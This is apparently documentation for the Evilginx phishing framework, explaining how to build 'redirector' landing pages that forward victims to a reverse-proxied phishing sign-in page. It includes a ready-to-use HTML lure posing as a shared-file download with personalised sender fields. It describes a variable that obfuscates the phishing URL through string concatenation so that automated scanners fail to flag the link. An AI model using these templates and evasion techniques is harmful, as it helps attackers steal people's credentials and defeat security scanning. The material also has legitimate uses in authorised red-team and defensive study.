Redirectors
Redirectors are little websites, acting as a landing pages to your phishing links. When anyone clicks on your generated phishing link, they will land on the redirector website. This website should redirect the visitor to the reverse proxied phishing sign-in page, either automatically or by requiring some user interaction.
This middle step is crucial to protecting your phishing links from automated online scanners flagging your phishing pages. Scanner will try to emulate the visit to your phishing link and if it can't figure out how to get redirected to the phishing page, it will not be able to flag the link as dangerous.
You can either make your redirector use a technique to automatically redirect a visitor, which the scanner will have trouble emulating or you can create a redirector requiring user interaction, like clicking a button, to proceed to the phishing page. It is up to you what you decide to use.
Redirectors reside by default under ./redirectors, in root directory of Evilginx, and every redirector is a separate directory, holding all the files required to properly render your landing page.
File index.html or index.htm is always the main file, which will be loaded when the redirector is about to be displayed to users.
Custom variables
Here is an example redirector index.html, which will render a button you need to press to get redirected to the phishing page.
<!doctype html>
<html lang="en">
<head>
<title>{from_name} ({from_email}) shared a file with you (1)</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body>
<div class="download">
<button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download "{filename}"</button>
</div>
<script>
function clickedDownload() {
window.location.assign({lure_url_js});
}
</script>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
</body>
</html>
As you can see the redirector uses several different placeholders for custom variables:
from_name- Name of the person who is sharing the filefrom_email- Email of the person who is sharing the filefilename- Filename of the shared file
All these custom variables can and should be customized while generating links for your lures. This allows to give your phishing landing page a personalized feel and lets you create your own redirectors with cutomizability in mind.
There are two custom variables, which are hardcoded into Evilginx and will always be replaced with the URL to the main phishing page, allowing your redirector to know where to redirect the visitor to:
lure_url_html- Turns into a phishing page URL:
https://www.linkedin.not-a-phish.com/?e=ue73er
lure_url_js- Turns into a phishing page URL as Javascript string obfuscated through concatenation:
'ht' + 't' + 'ps:' + '//' + 'w' + 'ww' + '.l' + 'i' + 'nke' + 'd' + 'in' + '.' + 'not' + '-a-' + 'p' + 'hi' + 'sh' + '.c' + 'om' + '/' + '?e' + '=ue' + '7' + '3er'
The latter is useful if you want to hide the redirect URL in your Javascript code. The string is obfuscated differently with each page load. More string obfuscation options are coming in the future.
In the example above, you can see that redirection happens via Javascript when the user clicks the download button and that the script uses the lure_url_js placeholder to replace it with obfuscated string containing the phishing page URL.